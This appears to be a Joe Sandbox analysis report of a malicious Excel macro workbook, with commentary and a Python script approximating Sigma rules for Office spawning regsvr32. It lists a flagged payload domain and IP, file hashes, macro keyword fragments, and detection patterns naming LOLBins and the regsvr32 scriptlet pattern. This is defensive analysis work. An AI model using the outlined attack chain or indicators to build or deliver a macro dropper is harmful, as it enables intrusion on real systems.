Analysis Report sample20210111-01.xlsm
Overview

General Information

Detection: Hidden Macro 4.0
Score: 88 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops certificate files (DER)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Classification: mal88.expl.evad.winXLSM@7/19@1/1 (see General Information below)

Startup: no entries on this page

Malware Configuration: no configs have been found

Yara Overview: no yara matches
Sigma Overview

System Summary:
- Sigma detected: BlueMashroom DLL Load (author: Florian Roth)
- Sigma detected: Microsoft Office Product Spawning Windows Shell (authors: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team)
- Sigma detected: Regsvr32 Anomaly (author: Florian Roth)

Taken together with the "Registers a DLL" signature, the three rules are consistent with a single chain: Excel spawned regsvr32.exe, which registered and loaded a DLL from a location an installer would not use.
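Two of the three Sigma rules above are process-creation rules and can be approximated in a few lines. The block below is an added example, not the Sigma project's rule text and not Joe Sandbox code: it encodes a simplified reading of "Microsoft Office Product Spawning Windows Shell" and "Regsvr32 Anomaly" (the image-load based "BlueMashroom DLL Load" rule is left out) and runs it over constructed process-creation events modelled on the Sysmon Event ID 1 fields. The paths, command lines and DLL names in the sample events are made up for the example; they are not taken from the report, and the OFFICE_APPS and SHELL_LIKE lists are an assumption about what the real rules cover.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Subset of the Sysmon Event ID 1 / Windows 4688 fields the two rules look at."""
    image: str
    parent_image: str
    command_line: str


# Assumption: approximations of the parent/child lists used by the real Sigma rules.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
               "msaccess.exe", "mspub.exe", "visio.exe", "eqnedt32.exe"}
SHELL_LIKE = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
              "regsvr32.exe", "rundll32.exe", "wmic.exe", "schtasks.exe", "msiexec.exe",
              "certutil.exe", "bitsadmin.exe"}


def basename(path: str) -> str:
    """Case-folded file name of a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawning_shell(ev: ProcessEvent) -> bool:
    """Office parent with a scripting host or LOLBin child. Benign Office sessions
    rarely launch these; a macro that needs to run code almost always does."""
    return basename(ev.parent_image) in OFFICE_APPS and basename(ev.image) in SHELL_LIKE


def regsvr32_anomaly(ev: ProcessEvent) -> bool:
    """regsvr32 used outside an installer context: registering a DLL from a user-writable
    path, launched from an interactive shell, or pulling a scriptlet over HTTP/FTP
    (the 'squiblydoo' pattern), or regsvr32 itself spawning wscript."""
    img, parent, cl = basename(ev.image), basename(ev.parent_image), ev.command_line.lower()
    if img == "regsvr32.exe":
        if "\\temp\\" in cl or "\\appdata\\" in cl:
            return True
        if parent in {"cmd.exe", "powershell.exe"}:
            return True
        if re.search(r"/i:(https?|ftp):", cl) or "scrobj.dll" in cl:
            return True
    return img == "wscript.exe" and parent == "regsvr32.exe"


RULES = {
    "Microsoft Office Product Spawning Windows Shell": office_spawning_shell,
    "Regsvr32 Anomaly": regsvr32_anomaly,
}


def evaluate(events):
    """Return (event index, rule title) for every rule that matches each event."""
    return [(i, title) for i, ev in enumerate(events)
            for title, rule in RULES.items() if rule(ev)]


# Constructed events (not from the report): Excel opened from Explorer, Excel registering
# a DLL from %TEMP%, a legitimate MSI install registering a DLL, and Excel crashing into
# the error-reporting process DWWIN.EXE, which must not trigger either rule.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
                 r"C:\Windows\explorer.exe",
                 r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" invoice.xlsm'),
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
                 r"regsvr32 -s C:\Users\user\AppData\Local\Temp\x.dll"),
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 r"C:\Windows\System32\msiexec.exe",
                 r"regsvr32 /s C:\Program Files\Vendor\app.dll"),
    ProcessEvent(r"C:\Windows\System32\DWWIN.EXE",
                 r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
                 r"dwwin.exe"),
]

if __name__ == "__main__":
    for idx, title in evaluate(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{title}] {basename(ev.parent_image)} -> {basename(ev.image)}: {ev.command_line}")
```

Only the second event fires, and it fires both rules at once, which is the shape of the report's Sigma section: one regsvr32 launch from Excel satisfies the Office-parent rule and the user-writable-path rule simultaneously. The MSI-driven regsvr32 and the crash-handler child show why the parent and path conditions matter; without them either rule would be noisy on an ordinary fleet.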
Signature Overview
AV Detection:
- Multi AV Scanner detection for domain / URL (source: VirusTotal)
- Multi AV Scanner detection for submitted file (sources: VirusTotal, ReversingLabs)
Software Vulnerabilities:
- Document exploit detected (UrlDownloadToFile): evidence type "section loaded"
- Document exploit detected (process start blacklist hit): evidence type "process created"
- Evidence rows for the remaining signatures in this group are listed by type only on this page, without their values: DNS query; TCP traffic (2 rows); IP address (2); ASN name; file created; string found in binary or memory (38); DNS traffic detected; network traffic detected (6); file created (dropped file). These are the rows behind the network and certificate-file signatures in the Signatures list above (DNS queries, HTTP GETs, unknown TCP traffic, IP address and Internet Provider seen with other malware, DER certificate files dropped).
System Summary:
- Document contains an embedded VBA macro which may execute processes: evidence "OLE, VBA macro" named pagesREviewsd (2 rows)
- Found Excel 4.0 Macro with suspicious formulas: evidence "initial sample" (4 rows)
- Evidence rows for the remaining signatures in this group are listed by type only on this page, without their values: OLE VBA macro line; OLE VBA macro named view_1_a_Layout; OLE indicator "VBA macros"; process created (10 rows); binary or memory string; classification label; file created (2); mutant created; file read (3); key opened (2); key value queried; VirusTotal and ReversingLabs lookups; automated click (2); window detected; initial sample (3 further rows); file opened; registry key monitored for changes; process information set (57); thread sleep time; process information queried. These are the rows behind the remaining signatures in the list above (VBA macros that run on document open/close, suspended-mode process creation, evasive sleep loops, registry monitoring, process crash, DLL registration).
Mitre Att&ck Matrix

Techniques with hits, grouped by tactic (the number in parentheses is the count printed next to the technique in the report's matrix; every other cell of the matrix is unmarked):
- Execution: Scripting (22), Exploitation for Client Execution (23)
- Privilege Escalation: Process Injection (11)
- Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (1), Process Injection (11), Scripting (22), Regsvr32 (1)
- Discovery: Query Registry (1), Virtualization/Sandbox Evasion (1), Process Discovery (1), Remote System Discovery (1), File and Directory Discovery (1), System Information Discovery (2)
- Command and Control: Encrypted Channel (2), Ingress Tool Transfer (1), Non-Application Layer Protocol (1), Application Layer Protocol (2)
- No hits under Initial Access, Persistence, Credential Access, Lateral Movement, Collection, Exfiltration, Network Effects, Remote Service Effects or Impact.
Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample:

| Detection | Scanner | Label |
|---|---|---|
| 27% | Virustotal | |
| 8% | Metadefender | |
| 22% | ReversingLabs | Script-Macro.Trojan.Wacatac |

Dropped Files: no antivirus matches

Unpacked PE Files: no antivirus matches

Domains (names not shown on this page): 0% Virustotal; 6% Virustotal

URLs (values not shown on this page): 32 URLs rated "safe" (0%) by URL Reputation and 1 rated "safe" (0%) by Avira URL Cloud
Domains and IPs

Contacted Domains:

| Name | IP | Active | Malicious | Reputation |
|---|---|---|---|---|
| cdn.digicertcdn.com | 104.18.10.39 | true | false | unknown |
| ppdb-legacy.man1lamongan.com | 199.59.242.150 | true | true | unknown |

cdn.digicertcdn.com is DigiCert's delivery host for certificate and CRL downloads; the report itself rates it non-malicious, and the "Drops certificate files (DER)" signature is most plausibly Windows fetching a certificate chain rather than the macro dropping a payload. The domain to act on is ppdb-legacy.man1lamongan.com.
URLs from Memory and Binaries: 19 URLs extracted (values not shown on this page), none flagged malicious; reputation high (10), unknown (7), low (2).
Contacted IPs (public):

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 199.59.242.150 | unknown | United States | 395082 | BODIS-NJUS | true |

BODIS-NJUS is the domain-parking provider Bodis. A payload host that resolves to a parking IP commonly means the domain had already lapsed or been taken over when the sample was run, which would also explain why the analysis shows no second-stage PE dropped or unpacked and ended on timeout.
General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 338158
Start date: 11.01.2021
Start time: 18:27:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 38s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: sample20210111-01.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal88.expl.evad.winXLSM@7/19@1/1
EGA Information: Failed
HDC Information: Failed
Simulations

Behavior and APIs: 18:28:06, API Interceptor
Joe Sandbox View / Context

- IPs: 199.59.242.150 was contacted by 19 other samples in the Joe Sandbox database, each rated malicious (sample names and SHA-256 hashes are not shown on this page).
- Domains: cdn.digicertcdn.com was contacted by 20 other samples, each rated malicious.
- ASN: BODIS-NJUS appears in 20 other samples, each rated malicious.
- JA3 Fingerprints: no context
- Dropped Files: no context

The IP and ASN context are meaningful; the domain context is not. Almost any sample that causes Windows to validate a certificate chain will contact cdn.digicertcdn.com, so a list of malicious samples that touched it says nothing about the domain.
Created / dropped Files

19 entries; file paths and file types are not shown on this page. DWWIN.EXE is the Windows application error-reporting (Dr. Watson) program, so the files it writes are crash-report artifacts of the process crash noted under Signatures, not files written by the macro. The only entry flagged malicious (entry 19) is 330 bytes with an entropy of 1.44, far too small and too uniform to be an executable stage.

1. Process: C:\Windows\System32\DWWIN.EXE; Category: dropped; Size: 914 bytes; Entropy (8bit): 7.367371959019618; Encrypted: false; Malicious: false; Reputation: moderate, very likely benign file
   SSDEEP: 24:c0oGlGm7qGlGd7SK1tcudP5M/C0VQYyL4R3fum:+JnJ17tcudRMq6QsF
   MD5: E4A68AC854AC5242460AFD72481B2A44; SHA1: DF3C24F9BFD666761B268073FE06D1CC8D4F82A4
   SHA-256: CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F
   SHA-512: 5622207E1BA285F172756F6019AF92AC808ED63286E24DFECC1E79873FB5D140F1CEB7133F2476E89A5F75F711F9813A9FBB8FD5287F64ADFDCC53B864F9BDC5

2. Process: C:\Windows\System32\DWWIN.EXE; Category: dropped; Size: 58936 bytes; Entropy (8bit): 7.994797855729196; Encrypted: true; Malicious: false; Reputation: high, very likely benign file
   SSDEEP: 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
   MD5: E4F1E21910443409E81E5B55DC8DE774; SHA1: EC0885660BD216D0CDD5E6762B2F595376995BD0
   SHA-256: CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
   SHA-512: 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246

3. Process: C:\Windows\System32\DWWIN.EXE; Category: dropped; Size: 252 bytes; Entropy (8bit): 3.0862995200743666; Encrypted: false; Malicious: false; Reputation: low
   SSDEEP: 6:kKd/zLDKVIbjcalgRAOAUSW0zeEpV1Ew1OXISMlcV/:RLutWOxSW0zeYrsMlU/
   MD5: 0FCAC07AEFF591E1FF36221FC15993B5; SHA1: 6AF4105DB3149F0580D3E8347CE34161EB9D1263
   SHA-256: 866EEAAF51EA184F5C6F6C26755C5F44D98B78AC37FE334267E6C41EEEBDFA1A
   SHA-512: A4AB264BF66FC9F69430B213CBF09BDD919777E0DEC8820AA77F06AF8D3A60645C8B9C39355176C97B7B8FDCFCD40F6F28C27599B31B59533925FC1D8E1F2970

4. Process: C:\Windows\System32\DWWIN.EXE; Category: dropped; Size: 326 bytes; Entropy (8bit): 3.117051994467751; Encrypted: false; Malicious: false; Reputation: low
   SSDEEP: 6:kKvVwswwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:nVykPlE99SNxAhUegeT2
   MD5: 4FA401A194E5284B0318ED59396335C5; SHA1: 82F0AEA431C0AC660303423D44DEC0F299C8D1E4
   SHA-256: 6942E5AA884492FA35293A7A7811E1228C463F90A67A883F83AB9FA64B2D07F8
   SHA-512: D536E1FEDB6B5392CAD3B8341B10A2B875D6945C499BA76F09486461FD7D6037BCF0CE2B74A392F92B6458AEA041914D4DA52C6DE0A07340C67EEA415EA4A97F

5. Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Category: dropped; Size: 1408 bytes; Entropy (8bit): 2.270567557934206; Encrypted: false; Malicious: false; Reputation: moderate, very likely benign file
   SSDEEP: 12:YnLmlzslqWuMap0Fol9l+EeQpN4lZsrBKlQzKlsl0u17u1DtDAcqitLMk+QCeJHo:Ync9640CXV34gNqXK7KhDDYB
   MD5: 40550DC2F9D56285FA529159B8F2C6A5; SHA1: DD81D41D283D2881BEC77E00D773C7E8C0744DA3
   SHA-256: DA935E8D60E93E41BCD7C3FBB1750EF3AC471C3AF78AFC8945DFBF31EB54A1E1
   SHA-512: FC354E4F37C9E1BA07DFC756F56A1ABE6A75230DEF908F34E43D35618B113A532E5B7C640F5B14BF75AC31003D8C66E06BA37A004E9357BF7896BD944A0514A0

6. Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Category: dropped; Size: 2653 bytes; Entropy (8bit): 7.818766151665501; Encrypted: false; Malicious: false; Reputation: low
   SSDEEP: 48:EMJaE2jR4jEJ/ff6nMVNzNzHuuQoCpMTjOWhXP4/3dlsIfnaedCByM9x:VkjR4j6Hf6nGOWXPe/v3k/9x
   MD5: 30D3FFA1E30B519FD9B1B839CC65C7BE; SHA1: 1EB0F0E160FF7440223A7FE46F08B503F03D3AFB
   SHA-256: 89A25BF794658FD3FABB1F042BCC283497B78E0A94098188F2DED7587B0CA3DC
   SHA-512: 88E3ABDADCBD7F308FCAED390A033F09208EAAD4053FE69DAA274CC14DD2BC815B4D63725C1EFEF3C592C1DEDE22A555DBF5303C096839F8338B2F6C9E0A3C50

7. Process: C:\Windows\System32\DWWIN.EXE; Category: modified; Size: 16312 bytes; Entropy (8bit): 3.7163402135276207; Encrypted: false; Malicious: false; Reputation: low
   SSDEEP: 96:4KbBakNZESI/fQ5QXI4izw+HbngICZgpYT1uPoGl9uyEYcbkMIbFY7UGQIiTOB1A:4LBKzFCEuhTlyZVaPYVaJa5GG
   MD5: 0FDF227B92A2ECDFE906E27D6C032F8A; SHA1: 0EB3004A2A4905A6DEAB1996B86B4328860EE777
   SHA-256: 11F89CB104E776E2E1077133CBBE0C568E3F4F870157534C1F489216E9328093
   SHA-512: B80868BD0B49AC51AFA4A3FA0BC4B0D23656AFADE3C46EB9C72224DD787F1CF7E1215563E021F59449CA97D46FF1540FC9A1F693D77783B303935DA3FCE0E061

8. Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Category: dropped; Size: 56572 bytes; Entropy (8bit): 7.850619347326348; Encrypted: false; Malicious: false; Reputation: low
   SSDEEP: 768:hnSWNrAli8zJjXl9e4JpKmyslLBti3rng54DpyNzSHOdFoKqbLNFq9z:hXUl/i434o9og540NzgO/ObLNFq9z
   MD5: DEC0E4FC83D4C848B110DB20629C98DC; SHA1: 9A7EC2860D75C9984F6713A08DA3085EF6BC91AE
   SHA-256: FB2A27AF526DF0402AA3712EC3F0E20C9704DAC783BC737C4FF46D3629D76812
   SHA-512: 1F430E39C5AF36D0CA40E33828EF4002D4BB6C39A891027F3F489E8ED64A72914F33EE09BD56746DA162F762121113C13CA5FE2C55F7A342DD8127ED4CB098A9

9. Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Category: dropped; Size: 1392 bytes; Entropy (8bit): 3.142934598289609; Encrypted: false; Malicious: false
   SSDEEP: 24:pll/r8suFosnbeTl/3vXkJXHIUbcW1IP/dOZ5GjXO/CUnHBFzE:pll/QFZbkXWGlON/xBFY
   MD5: 91CFCC4A1A09DB77E653BB2E13F9B179; SHA1: 165023666DAE5D631E04A9220442E401075DB3D1
   SHA-256: BA228004FCDF193E308AB0545750EE259A1D20999071DF01CD8B4B3964256422
   SHA-512: 2FDE452FAFAB930FE87B4E633057B63D4F21FD34634D8153423467102CAB76A939694316098E5AAECFE05AAEC90632FDF5EF79E21647AF5C70162EC0693A9118

10. Process: C:\Windows\System32\DWWIN.EXE; Category: dropped; Size: 58936 bytes; Entropy (8bit): 7.994797855729196; Encrypted: true; Malicious: false (same content as entry 2)
   SSDEEP: 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
   MD5: E4F1E21910443409E81E5B55DC8DE774; SHA1: EC0885660BD216D0CDD5E6762B2F595376995BD0
   SHA-256: CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
   SHA-512: 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246

11. Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Category: dropped; Size: 241332 bytes; Entropy (8bit): 4.206769656577553; Encrypted: false; Malicious: false
   SSDEEP: 1536:cG4LEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:c5NNSk8DtKBrpb2vxrOpprf/nVq
   MD5: C5E9F5703FA359DD72FBB85355945491; SHA1: 21549B782C4424D9100D4477D34847842528426E
   SHA-256: 98870A08EBB24B9C458C0ECE3F7CDDF3089A26C83403BF653B00ABBF244FFA95
   SHA-512: 0AC6C3C8EF98C31CCA647277EAB1C28565ACA4F0BB02A7BFBC040594DC327D6D7BD37D601860D47823EDA5FCC11354C5C67A88EE1C2890625DA2F330DB9D7126

12. Process: C:\Windows\System32\DWWIN.EXE; Category: dropped; Size: 152533 bytes; Entropy (8bit): 6.31602258454967; Encrypted: false; Malicious: false
   SSDEEP: 1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
   MD5: D0682A3C344DFC62FB18D5A539F81F61; SHA1: 09D3E9B899785DA377DF2518C6175D70CCF9DA33
   SHA-256: 4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
   SHA-512: 0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3

13. Process: C:\Windows\System32\DWWIN.EXE; Category: dropped; Size: 3110 bytes; Entropy (8bit): 3.6796097788243274; Encrypted: false; Malicious: false
   SSDEEP: 96:Shz4tU6o7VxBt3uhhgHPe40PAn5xp38MkSMY3:Wl7LBNuhhgG45nv58MlMI
   MD5: 9951D43E6E3E0625775F9777E865C7B5; SHA1: 6D551E14B691ED0A9383729CDD21BE086CD055AA
   SHA-256: 2E5E8A5064AA4428F1BD0F83AAB230604EBBC4FCAC184BDCDC22006D2E74B86D
   SHA-512: 8CDF8C3FE9AA9116F6621F44429268639679D8A2A5784DC0EA7AE172235742C67671188DF6786256B773A65A36E738A15FD11B11BF3F4529CAD2ED8DFD38BB7D

14. Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Category: modified; Size: 51613 bytes; Entropy (8bit): 7.823714360059984; Encrypted: false; Malicious: false
   SSDEEP: 768:UAK3YYc0e76UlwEBwuOASEvIrC98rbqFqcO+hxOVPZKp42A205LEdT/C9WNJVTQY:d976UmE+uhBQrC98PGZHUnN5LaLTQDi9
   MD5: 138F4E0E9934BE4DA0426CB5321F0D7F; SHA1: 84070B3A221BFB5C0DE40209E639669583CEC8C3
   SHA-256: 1D254C6FD6801C024975A8EEF3575FE869C3AC88AF910C27E24DCA3957243217
   SHA-512: 5E69E147D8439A637A11C9B2481E0778E65DA67BF1E059FB038266990E3B0C608E2DC8BD3BFE4D187191F8D54C138663EF215073FF872A9A68255091DC7C35A9

15. Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Category: dropped; Size: 867 bytes; Entropy (8bit): 4.48075162575188; Encrypted: false; Malicious: false
   SSDEEP: 12:85Q/k2kcLgXg/XAlCPCHaXtB8XzB/DhiUBEX+WnicvbsaRbDtZ3YilMMEpxRljKA:85dDK/XTd6jhhnEYehtDv3qNArNru/
   MD5: B339C286696BE14A0BFB8FB5E272DD38; SHA1: F3CC42F0CD4D791395DF1E3D43223997C63E4D41
   SHA-256: A352E71022A6431154D763D66924E48A7411E8F285071E107CAA18D18EAACDFB
   SHA-512: 85695DE99B0CC82045A566D3BE60B0DC43FE56ECE3B080992384C3DF51220EDEEDFFEA15E51ADEBA897996E1AE444C9A8E5FE34EA9512990A2D5B0594959B1D0

16. Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Category: dropped; Size: 106 bytes; Entropy (8bit): 4.288085753919832; Encrypted: false; Malicious: false
   SSDEEP: 3:oyBVomxWdxUNIVUYOhVdUNIVUYmxWdxUNIVUYv:djuSL1WLeSLC
   MD5: 3A4CD3A9401D75DF179FD5850F863649; SHA1: 1036B9ABFAF918FB96990DA3DC6350DE5ADC5EAB
   SHA-256: 6A59F34635BEEEC2999D038D85914250458F714CB546BD29FCFA3CCA1B0E73EF
   SHA-512: 31AB0EE07F659FA4EAD5608CCF3C8E772918F24400EE013FE83838D8106BFDE4ED823B91D2C4464B108EB37F2FB15C71E9CB0EBC7AB3A2EFC469C253136D17D4

17. Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Category: dropped; Size: 2108 bytes; Entropy (8bit): 4.5041154003832595; Encrypted: false; Malicious: false
   SSDEEP: 48:8Vos/XT0jFxEllGxVl1NAQh2Vos/XT0jFxEllGxVl1NAQ/:8ys/XojFxjLNAQh2ys/XojFxjLNAQ/
   MD5: 32B7E994BF13801BEBBC3697536E86AD; SHA1: 0BF3648CA3A0DF2E5FF3FF1A57F3E20394314242
   SHA-256: 3FC1222BC12CBE95C2EFC8E5E43754912AAF46E37B1D17541FA2011FAA74F613
   SHA-512: 75F0D7763F12045792F8A68FF5DA3E40346814F53F7CCE1CD8EB11A0857C922A2156629B2BABA3FC8C57754DCB02596929248A9313E40F91497C0266E3C66AA9

18. Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Category: dropped; Size: 56539 bytes; Entropy (8bit): 7.850377009214; Encrypted: false; Malicious: false
   SSDEEP: 1536:hXUl/i43FH4c93BUJn5r3i7ct2ObLNFqFWf:hO/dthFIdS7BO/AWf
   MD5: 8A3A81530F27C8EA5D3597C53C57E6DE; SHA1: 9B7503B11FD8F95656380A3DC6B3056C8F07B7AA
   SHA-256: 4FF01EF2F667E67A0D88688505BD1B86BA3C89F90E792DB92A73BC4D15809EBC
   SHA-512: E271FA1D22EA3AD8FA29F73D51EDC852F6EEC7C9E9992D12351AB58E59BF9AE0F1F09B2DDBA5FAD6063DE1368B4BDEB30423A0543E9D94EFF01EFB122329C455

19. Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Category: dropped; Size: 330 bytes; Entropy (8bit): 1.4377382811115937; Encrypted: false; Malicious: true
   SSDEEP: 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
   MD5: 96114D75E30EBD26B572C1FC83D1D02E; SHA1: A44EEBDA5EB09862AC46346227F06F8CFAF19407
   SHA-256: 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
   SHA-512: 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Static File Info

File name: sample20210111-01.xlsm
File size: 40268 bytes
Entropy (8bit): 7.75941359400182
MD5: fa5350d4304c4c2ceafa435244b5a5fc
SHA1: fc8a20962b8cf86568b1e85be02ee9c7b62d94b2
SHA256: 0104974a7bf43e2e31d25ae485f57c62efe89eaea2d3e520db8a76fa70dd956d
SHA512: 09cf2c537c358aea59a242b2b25129cc780bcc571e0ef611e2b1eb40078c1ff27356d1a45b1dd42249685e97b18e12173be2dde0e54bf4913fcce4b3703ea625
SSDEEP: 768:1wTZYx6TBDUzVXaI4/ybclX7aV+uFdeq9AQxD2KL0gnp5zFVqJlZ:sa6aVXaPaG7zyvxDhLnzjqJlZ
File Content Preview: PK..........!.o.m.....*.......[Content_Types].xml ...(......................................................................................................................................................................................................
Icon Hash: e4e2aa8aa4bcbcac

The "PK" magic and the [Content_Types].xml entry at the start of the preview confirm an Office Open XML (ZIP) container, which is why the file entropy of 7.76 is unremarkable on its own: deflate-compressed parts push any OOXML document close to 8 bits per byte. The file type and TrID fields are not shown on this page.
Static OLE Info

Document Type: OpenXML
Number of OLE Files: 2

OLE File "/opt/package/joesandbox/database/analysis/338158/sample/sample20210111-01.xlsm"

Indicators:
Has Summary Info: False
Application Name: unknown
Encrypted Document: False
Contains VBA Macros: True
(No Word, Workbook/Book, PowerPoint, Visio or ObjectPool stream and no Flash object count is reported for this container.)

Summary:
Create Time: 2020-12-07T14:38:21Z
Last Saved Time: 2021-01-11T13:42:02Z
Security: 0
(Author, Last Saved By and Creating Application are blank.)

Document Summary:
Thumbnail Scaling Desired: false
Contains Dirty Links: false
Shared Document: false
Changed Hyperlinks: false
Application Version: 16.0300
(Company is blank.)

Two points worth noting from the metadata: the document was last saved on the same day as the analysis, and the application version 16.0300 is an Office 16.x build (Office 2016 or later), so the file was produced with a newer Office than the Office 2010 SP2 environment it was detonated in.

Streams with VBA

VBA File Name: Module1.bas
Stream Path: VBA/Module1
Stream Size: 3215
Data ASCII: . . . . . . . . . * . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . x . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw: 01 16 03 00 03 f0 00 00 00 2a 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 58 05 00 00 f0 09 00 00 00 00 00 00 01 00 00 00 ba 78 ca 26 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords: Integer
bycilke() |
VB_Name |
MiV(sem.value) |
homepodd() |
homepodd |
Error |
Integer) |
bycilke |
Function |
ol).Name |
"!"): |
String |
"ab": |
Split(govs, |
Randomize: |
yellowsto(yel |
Next: |
ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants) |
yellowsto(Oa)))) |
Integer |
yellowsto |
ol).value |
nimo(Int((UBound(nimo) |
Replace(Vo, |
Chr(sem.Row) |
Sheets(ol).Cells(homepodd, |
"ab")) |
Split(kij(ol), |
yellowsto(homepodd)) |
Rnd)) |
(Run("" |
"moreP_" |
Variant) |
Attribute |
Resume |
pagesREviewsd(Optional |
ecimovert(nimo |
ecimovert |
MsgBox |
VBA Code |
---|
|
VBA File Name: Sheet1.cls, Stream Size: 1614 |
---|
General | |
---|---|
Stream Path: | VBA/Sheet1 |
VBA File Name: | Sheet1.cls |
Stream Size: | 1614 |
Data ASCII: | . . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . x . k . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . " . v i e w _ 1 _ a , 1 , 0 , M S F o r m s , M u l t i P a g e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . |
